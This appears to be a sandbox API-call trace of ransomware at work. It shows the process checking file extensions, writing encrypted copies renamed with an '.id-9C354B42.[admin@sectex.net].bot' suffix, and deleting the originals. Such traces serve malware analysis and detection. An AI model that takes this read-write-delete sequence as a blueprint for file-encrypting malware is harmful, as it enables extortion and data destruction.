	[0050.514] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.514] lstrlenW (lpString=".jpg") returned 4
	[0050.514] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0050.514] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0050.514] lstrlenW (lpString="TravelIntroToMain.wmv") returned 21
	[0050.514] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0051.799] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=205220) returned 1
	[0051.799] CloseHandle (hObject=0x1f4) returned 1
	[0051.799] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv")) returned 0x20
	[0051.799] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.799] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0051.799] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.799] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.799] lstrlenW (lpString=".doc") returned 4
	[0051.799] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0051.799] lstrlenW (lpString=".docx") returned 5
	[0051.799] lstrcmpiW (lpString1=".docx", lpString2="n.wmv") returned -1
	[0051.799] lstrlenW (lpString=".pdf") returned 4
	[0051.800] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString=".xls") returned 4
	[0051.800] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0051.800] lstrlenW (lpString=".xlsx") returned 5
	[0051.800] lstrcmpiW (lpString1=".xlsx", lpString2="n.wmv") returned -1
	[0051.800] lstrlenW (lpString=".ppt") returned 4
	[0051.800] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.800] lstrlenW (lpString=".zip") returned 4
	[0051.800] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0051.800] lstrlenW (lpString=".rar") returned 4
	[0051.800] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString=".bz2") returned 4
	[0051.800] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString=".7z") returned 3
	[0051.800] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0051.800] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.800] lstrlenW (lpString=".dbf") returned 4
	[0051.800] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.800] lstrlenW (lpString=".1cd") returned 4
	[0051.800] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.800] lstrlenW (lpString=".jpg") returned 4
	[0051.800] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.800] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.800] lstrlenW (lpString=".doc") returned 4
	[0051.800] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString=".docx") returned 5
	[0051.800] lstrcmpiW (lpString1=".docx", lpString2="n.wmv") returned -1
	[0051.800] lstrlenW (lpString=".pdf") returned 4
	[0051.800] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0051.800] lstrlenW (lpString=".xls") returned 4
	[0051.801] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0051.801] lstrlenW (lpString=".xlsx") returned 5
	[0051.801] lstrcmpiW (lpString1=".xlsx", lpString2="n.wmv") returned -1
	[0051.801] lstrlenW (lpString=".ppt") returned 4
	[0051.801] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0051.801] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.801] lstrlenW (lpString=".zip") returned 4
	[0051.801] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0051.801] lstrlenW (lpString=".rar") returned 4
	[0051.801] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0051.801] lstrlenW (lpString=".bz2") returned 4
	[0051.801] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0051.801] lstrlenW (lpString=".7z") returned 3
	[0051.801] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0051.801] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.801] lstrlenW (lpString=".dbf") returned 4
	[0051.801] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0051.801] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.801] lstrlenW (lpString=".1cd") returned 4
	[0051.801] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0051.801] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 72
	[0051.801] lstrlenW (lpString=".jpg") returned 4
	[0051.801] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0051.801] lstrcmpiW (lpString1=".xsl", lpString2=".bot") returned 1
	[0051.801] lstrlenW (lpString="Informix.xsl") returned 12
	[0051.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.061] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=30948) returned 1
	[0052.061] CloseHandle (hObject=0x204) returned 1
	[0052.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 0x20
	[0052.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.062] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.062] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0052.062] GetLastError () returned 0x0
	[0052.062] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x78e4, lpOverlapped=0x0) returned 1
	[0052.064] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x78f0, lpOverlapped=0x0) returned 1
	[0052.065] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.065] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0052.066] SetEndOfFile (hFile=0x184) returned 1
	[0052.066] CloseHandle (hObject=0x184) returned 1
	[0052.066] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.066] SetEndOfFile (hFile=0x204) returned 1
	[0052.067] CloseHandle (hObject=0x204) returned 1
	[0052.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.067] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 1
	[0052.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.067] lstrlenW (lpString=".doc") returned 4
	[0052.067] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.067] lstrlenW (lpString=".docx") returned 5
	[0052.067] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1
	[0052.067] lstrlenW (lpString=".pdf") returned 4
	[0052.067] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.067] lstrlenW (lpString=".xls") returned 4
	[0052.067] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString=".xlsx") returned 5
	[0052.068] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1
	[0052.068] lstrlenW (lpString=".ppt") returned 4
	[0052.068] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.068] lstrlenW (lpString=".zip") returned 4
	[0052.068] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.068] lstrlenW (lpString=".rar") returned 4
	[0052.068] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString=".bz2") returned 4
	[0052.068] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString=".7z") returned 3
	[0052.068] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.068] lstrlenW (lpString=".dbf") returned 4
	[0052.068] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.068] lstrlenW (lpString=".1cd") returned 4
	[0052.068] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.068] lstrlenW (lpString=".jpg") returned 4
	[0052.068] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.068] lstrlenW (lpString=".doc") returned 4
	[0052.068] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString=".docx") returned 5
	[0052.068] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1
	[0052.068] lstrlenW (lpString=".pdf") returned 4
	[0052.068] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString=".xls") returned 4
	[0052.068] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.068] lstrlenW (lpString=".xlsx") returned 5
	[0052.068] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1
	[0052.068] lstrlenW (lpString=".ppt") returned 4
	[0052.069] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.069] lstrlenW (lpString=".zip") returned 4
	[0052.069] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.069] lstrlenW (lpString=".rar") returned 4
	[0052.069] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.069] lstrlenW (lpString=".bz2") returned 4
	[0052.069] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.069] lstrlenW (lpString=".7z") returned 3
	[0052.069] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.069] lstrlenW (lpString=".dbf") returned 4
	[0052.069] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.069] lstrlenW (lpString=".1cd") returned 4
	[0052.069] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80
	[0052.069] lstrlenW (lpString=".jpg") returned 4
	[0052.069] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.069] lstrcmpiW (lpString1=".xsl", lpString2=".bot") returned 1
	[0052.069] lstrlenW (lpString="sql70.xsl") returned 9
	[0052.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.070] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=32146) returned 1
	[0052.070] CloseHandle (hObject=0x204) returned 1
	[0052.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 0x20
	[0052.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.070] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.070] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0052.071] GetLastError () returned 0x0
	[0052.071] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x7d92, lpOverlapped=0x0) returned 1
	[0052.073] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x7da0, lpOverlapped=0x0) returned 1
	[0052.074] ReadFile (in: hFile=0x204, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.074] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0052.074] SetEndOfFile (hFile=0x184) returned 1
	[0052.074] CloseHandle (hObject=0x184) returned 1
	[0052.075] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.075] SetEndOfFile (hFile=0x204) returned 1
	[0052.076] CloseHandle (hObject=0x204) returned 1
	[0052.076] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.076] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 1
	[0052.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.076] lstrlenW (lpString=".doc") returned 4
	[0052.076] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.076] lstrlenW (lpString=".docx") returned 5
	[0052.076] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.076] lstrlenW (lpString=".pdf") returned 4
	[0052.076] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.076] lstrlenW (lpString=".xls") returned 4
	[0052.076] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.076] lstrlenW (lpString=".xlsx") returned 5
	[0052.076] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.076] lstrlenW (lpString=".ppt") returned 4
	[0052.076] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.076] lstrlenW (lpString=".zip") returned 4
	[0052.076] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.076] lstrlenW (lpString=".rar") returned 4
	[0052.076] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.076] lstrlenW (lpString=".bz2") returned 4
	[0052.077] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString=".7z") returned 3
	[0052.077] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.077] lstrlenW (lpString=".dbf") returned 4
	[0052.077] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.077] lstrlenW (lpString=".1cd") returned 4
	[0052.077] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.077] lstrlenW (lpString=".jpg") returned 4
	[0052.077] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.077] lstrlenW (lpString=".doc") returned 4
	[0052.077] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString=".docx") returned 5
	[0052.077] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.077] lstrlenW (lpString=".pdf") returned 4
	[0052.077] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString=".xls") returned 4
	[0052.077] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString=".xlsx") returned 5
	[0052.077] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.077] lstrlenW (lpString=".ppt") returned 4
	[0052.077] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.077] lstrlenW (lpString=".zip") returned 4
	[0052.077] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.077] lstrlenW (lpString=".rar") returned 4
	[0052.077] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString=".bz2") returned 4
	[0052.077] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.077] lstrlenW (lpString=".7z") returned 3
	[0052.078] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.078] lstrlenW (lpString=".dbf") returned 4
	[0052.078] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.078] lstrlenW (lpString=".1cd") returned 4
	[0052.078] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77
	[0052.078] lstrlenW (lpString=".jpg") returned 4
	[0052.078] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.078] lstrcmpiW (lpString1=".xsl", lpString2=".bot") returned 1
	[0052.078] lstrlenW (lpString="sql90.xsl") returned 9
	[0052.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.078] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=39515) returned 1
	[0052.078] CloseHandle (hObject=0x204) returned 1
	[0052.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 0x20
	[0052.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.079] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.079] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
